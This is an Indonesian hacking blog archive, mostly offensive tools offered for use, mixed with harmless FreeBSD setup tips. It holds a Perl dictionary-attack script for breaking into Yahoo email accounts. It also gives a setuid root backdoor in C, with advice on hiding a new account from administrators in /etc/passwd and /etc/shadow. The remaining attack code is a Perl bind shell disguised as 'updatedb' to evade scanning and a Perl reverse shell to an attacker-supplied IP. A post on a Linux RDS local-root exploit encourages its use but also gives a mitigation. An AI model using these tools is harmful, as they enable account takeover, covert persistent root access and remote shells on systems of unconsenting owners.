Perl Yahoo Bruteforce

Januari 13, 2011

serangan brute force adalah sebuah teknik terhadap sistem keamanan komputer dengan menggunakan percobaan terhadap semua kunci(password) yang mungkin.

Berikut sebuah simple perl coding yang saya buat untuk melakukan brute force dengan metode dictionary attack pada email yahoo :

!/usr/bin/perl
use HTTP::Cookies;
use LWP::UserAgent;
system (clear);
print color 'reset';
print color "green";
print q(
###############################################################
#                 Yahoo Dictionary Attack 	              #
#                http://makassarhacker.com                    #
###############################################################
#     Insert your password list in a file wordlist.txt	      #                                              
#-------------------------------------------------------------#
###############################################################
#                   Coding By th3_w1tch   		      #                                              
#	        https://th3w1tch.wordpress.com		      #
###############################################################
);
print "Yahoo Username : ";
$username=<STDIN>;
chomp ($username);
print "                Press Enter to Start Brute";
$enter=<>;
print "Brute . . .\n";
open (MYFILE, 'wordlist.txt');
while (<MYFILE>) {
 chomp;
  $password=$_;
  $myCookies = HTTP::Cookies->new();
  my $ua = LWP::UserAgent->new;
  $ua->cookie_jar($myCookies);
  $ua->agent('Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13');
  my $url = ("https://login.yahoo.com/config/login?login=".$username."&passwd=".$password);
  my $login = $ua->get($url);
  if ($login->is_success){
   $respon = $login->content;
    if ($respon=~m/Invalid ID or password/){print $username,":",$password," -> Login Failed\n";}
    else {
     open (FILE, '>>success.txt');
     print FILE "$username",":","$password\n";
     close (FILE);
     print $username,":",$password," -> Login Success\n";
     print "Password Crack ","$password\n";
     exit(0);
    }
  }
 }
close (MYFILE);

Save Code diatas dengan yahoobrute.pl, kemudian jalankan di konsole dengan perintah

root@bt:~#perl yahoobrute.pl

Thank’s Semoga Berguna, Enjoy Your Hack . . . . . .

Witchxtool v.1.1

Januari 11, 2011

Witchxtool v.1.1 release penambahan yahoo password checker :
th3_w1tch

silahkan download di packet storm atau sourceforge

Semoga Bermanfaat, Enjoy your hack 😀

witchxtool Ver.1.0

Januari 3, 2011

witchxtool Ver.1.0 sebuah tools untuk memudah aktifitas hacking anda
witchxtool

silahkan download disini n jangan lupa baca README nya untuk menggunakan tools ini

Thank’s Semoga Bermanfaat, Enjoy Your Hack

FreeBSD Allow Root Login KDM

Desember 30, 2010

Setelah instalasi FreeBSd biasanya pada saat login root di KDM itu tidak diizinkan, dikarenakan pengaturan default freeBSD memang demikian. untuk mengizinkan login root di KDM harus mengedit file /usr/local/share/config/kdm/kdmrc
1.akses root di konsole dengan su

user@bsd~$su

root@bsd~#

2. Edit File /usr/local/share/config/kdm/kdmrc menggunakan vi

root@bsd~#vi /usr/local/share/config/kdm/kdmrc

cari baris berikut

AllowRootLogin=False

Ubah menjadi True

AllowRootLogin=True

3. Logout dan silahkan Login Root

Terima Kasih, Semoga Bermanfaat, Enjoy ROOT

FreeBSD Error Locate database too small

Desember 30, 2010

Locate adalah suatu pencarian di sistem unix dengan cepat dan mudah, tapi kadang si locate mengalami masalah ketika melakukan pencarian seperti :

user@bsd$locate firefox
locate: database too small: /var/db/locate.database

Kadang Erornya seperti itu, untuk menanggulanginya yaitu
1. Hapus FIle /var/db/locate.database

user@bsd$rm -rf /var/db/locate.database

2.Update database Locate

user@bsd$/usr/libexec/locate.updatedb

3. Sekarang jalankan perintah locate dan liat Hasilnya.

Ok sekian Dulu, Mudah-mudahan Bermanfaat

Install Modem Options Icon225 FreeBSD

Desember 30, 2010

ok langsung Step By step bro

1. Download Dulu ini dan ini
2. Extract dan install hso-20081023.tar.gz

root@bsd#tar -xzvf hso-20081023.tar.gz

root@bsd#cd hso-20081023

root@bsd#make && make install

3. Edit File /boot/loader.conf, tambakan baris berikut

u3g_load=”YES”
umass_load=”YES”

4. Buat File di /etc/ dengan nama rc.local untuk load otomatis dengan baris berikut

kldload /boot/kernel/hso.ko

5. create File di /etc/devd/option.conf sesuaikan vendor dan product modemnya selain modem options icon225 dengan perintah

root@bsd#usbdevs -v
port 1 addr 2: full speed, power 500 mA, config 1, Globetrotter HSDPA Modem(0x6971), Option N.V.(0x0af0), rev 0.00

attach 100 {
match “device-name” “umass[0-9]+”;
match “vendor” “0x0af0”;
match “product” “0x6971”;
match “devclass” “0x00”;
action “sleep 1; /sbin/camcontrol cmd `/sbin/camcontrol devlist | /usr/bin/grep ZCOPTION | /usr/bin/awk ‘{match($11, /pass[0-9]+/); print substr($11, RSTART, RLENGTH) }’` -c ’01 00 00 00 00 00’ -i 1 i1 > /dev/null”;
};

6. Tambahkan baris berikut di /etc/ppp/ppp.conf sesuaikan providernya

3g:
set device /dev/cuaHSO0.0
set dial “ABORT BUSY ABORT NO\\sCARRIER TIMEOUT 5 \”\” ATZ OK-ATZ-OK AT+CGDCONT=1,\\\”IP\\\”,\\\”internet\\\” OK \\dATD\\T TIMEOUT 40 CONNECT”
set phone “*99#”
set authname “”
set authkey “”
set ifaddr 10.0.0.1/0 10.0.0.2/0 255.255.255.0 0.0.0.0
enable lqr
disable ipv6cp

7. Reboot komputernya
8. extract dan install programnya hsoctl-20081023.tar.gz

root@bsd#tar -xzvf hsoctl-20081023.tar.gz

make && make install
root@bsd#cp hsoctl /usr/bin/

9.Liat device

root@bsd#ifconfig -a
hso0: flags=1008c3 metric 0 mtu 1500
ether 40:0c:e3:69:71:00

Modem Kedetect
10. langsung Koneksi

root@bsd#hsoctl hso0
Registered to “IND TELKOMSEL” (UMTS)
Connected to “IND TELKOMSEL” (mobinity), UMTS
IP address: 10.132.221.76, Nameservers: 202.3.210.10, 202.3.208.10

Tredeng modem connect.

Ok sekian Mudahan2 bisa bermanfaat

Linux RDS Exploit (Local Root 2.6.30-2.6.36-rc8)

Desember 15, 2010

RDS (Reliable Datagram Sockets) adalah sebuah protokol antarproses (IPC) yang disediakan untuk melayani pengiriman datagram yang berurutan, selalu tersedia, memiliki overhead rendah serta handal, antara ratusan hingga ribuan titik akhir data yang tidak terkoneksi. RDS digunakan oleh program database ORACLE untuk saling mengirimkan pesan sistem antara titik-titik akhir (soket) pada sistem local atau titik-titik akhir yang tersebar pada beberapa mesin dengan proses-proses pada sisi penggunanya sekaligus memverifikasi dan memvalidasi apakah data-data yang terkirim tersebut memiliki penerima atau tidak. Celakanya linux kernel versi 2.6.30 hingga 2.6.36-rc8 memiliki sebuah bug yang sangat parah dan berbahaya karena dapat mengakibatkan pengambilalihan seluruh sistem oleh pengguna biasa (pengguna normal) yang menjadikan dirinya root (pengguna root) dengan memanfaatkan sebuah celah keamanan yang berada pada level kernel yang dalam hal ini pada modul RDS.

Saya telah mencoba eksploit ini dan berhasil menjadi root pada sistem Ubuntu 10.04 dan Fedora 12 yang telah di-update hingga tanggal 22 Oktober 2010. Anda cukup mengunduh kode C eksploitnya dan kemudian mengkompilasinya dengan gcc, lalu login sebagai user biasa ke sebuah sistem linux, kemudian masukkan dan jalankan program eksploitnya. Dalam beberapa detik anda akan langsung menjadi root. Penemu kesalahan ini, Dan Rosenberg, menyatakan bahwa dia telah berhasil mengeksploit sistem OpenSuse. Lain halnya dengan Slackware Linux, versi current pada tanggal yang sama, dimana eksploit ini gagal untuk mendapatkan seluruh simbol modul RDS yang diekspor kernel sehingga proses eksploit terhenti dan saya tidak sampai menjadi root. Kegagalan ini kemungkinan disebabkan oleh prosedur kompilasi kernel Slackware yang selalu men-strip (menghilangkan) kode debug yang tidak diperlukan dari binary kernel.

Jadi, anda-anda atau mungkin teman-teman anda yang menggunakan Fedora, OpenSuse, atau Ubuntu di mesin-mesin produksinya, saya sarankan untuk segera memperbarui kernel anda. Bagi anda yang tidak sempat memperbarui sistem, dan tidak menggunakan database oracle, kita dapat mencegah eksploit ini dengan menambahkan parameter untuk modprobe modul rds seperti ini:

# echo “alias net-pf-21 off” > /etc/modprobe.d/disable-rds

Thank’s Semoga Bermanfaat Goot Root
source : walecha.net

C Root Access (Root Backdooring Bag-1)

Desember 15, 2010

Teknik root backdoor sangat penting ketika mandapatkan akses root, root backdoor harus disembunyikan sebaik-baiknya agar gak ketahuan oleh si Admin.
1. Ketika melakukan adduser, biasakan untuk mengedit file /etc/passwd dan /etc/shadow , karena ketika anda membuat user baru, user yang anda buat terletak di paling bawah file /etc/passwd dan /etc/shadow jadi edit file /etc/passwd dan /etc/shadow dan user yang baru anda buat simpan di tengah2, agak tidak ketahuan oleh si admin bahwa terdapat user baru.
ok lanjut, Nih ada sedikit cooding root backdoor dari brotha Gameover – Xcrew, yah lumayan amanlah

#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>
int main()
{
    system("echo  ");
    system("echo -==[ th3_w1tch Root Backdoor ]==-\r\n");
    system("echo -==[ Makassar Etical Hacker ]==-\r\n");
    system("echo -==[ www.makassarhacker.com ]==-\r\n");
    system("echo  ");
    system("echo Starting Interactive Shell...\r\n");
    system("echo Session Started. Enjoy the hack !!");
    system("echo  ");
    setuid(0);
    setgid(0);
    setgroups(0,0);
    system("su");
    system("exit");
    return 0;
}

Compile Codenya, di /usr/bin

cd /usr/bin/

gcc -o main door.c

chmod gu+s main

chmod o+x main

Ok Setelah selesai semua, sekarang login via SSH, atau windus bisa menggunakan putty.

ssh user@target.com

sh-3.2$main

-==[ th3_w1tch Root Backdoor ]==-
-==[ Makassar Etical Hacker ]==-
-==[ http://www.makassarhacker.com ]==-

Starting Interactive Shell…
Session Started. Enjoy the hack !!
root@target:~#id
uid=0(root) gid=0(root)

Ok Thank’s, Backdoor Succesfully

Perl Binding (Backdoor)

Desember 14, 2010

Nih ada sedikit coding perl, untuk melakukan port binding, dan dapat juga digunakan sebagai backdoor. port ynag binding yaitu port 52767, dapat diganti sesuai keinginan anda, tapi biasakan menggunakan port diatas 10000 agar tidak ketahuan oleh nmap port default scanner.

#!/usr/bin/perl
$port = 52767;
$port = $ARGV[0] if $ARGV[0];
exit if fork;
$0 = "updatedb" . " " x100;
$SIG{CHLD} = 'IGNORE';
use Socket;
socket(S, PF_INET, SOCK_STREAM, 0);
setsockopt(S, SOL_SOCKET, SO_REUSEADDR, 1);
bind(S, sockaddr_in($port, INADDR_ANY));
listen(S, 50);
while(1)
{
 accept(X, S);
 unless(fork)
 {
 open STDIN, "<&X";
 open STDOUT, ">&X";
 open STDERR, ">&X";
 close X;
exec("/bin/sh");
 }
 close X;
}  

Untuk melakukan koneksi dapat menggunakan Netcat. dengan perintah

nc -vv [targer] [port]

Thanks semoga bermanfaat

Perl Backconnect

November 21, 2010

Nih sedikit coding untuk melakukan backconnect

#!/usr/bin/perl
use Socket;
$ip = $ARGV[0];
$port = $ARGV[1];
if (!$ARGV[0]) {
print q(
###############################################################
#        perintah : perl backconnect.pl [ip] [port]           #
#-------------------------------------------------------------#
#    [ip]    : IP              (127.0.0.1)                    #
#    [port ] : output          (8888)                         #
#                                                             #
###############################################################
);
exit(1);
}
    print "Connecting ke $ip\n";
    $connect = getprotobyname('tcp');
    socket(SERVER, PF_INET, SOCK_STREAM, $connect) || die ("Error Koneksi  [check IP:Port]");
    if (!connect(SERVER, pack "SnA4x8", 2, $port, inet_aton($ip))) {die("Error Koneksi  [check IP:Port] ");}

      open(STDIN,">&SERVER");
      open(STDOUT,">&SERVER");
      open(STDERR,">&SERVER");
      exec {'/bin/sh'} '-bash' . "\0" x 4;

Semoga Berguna . . .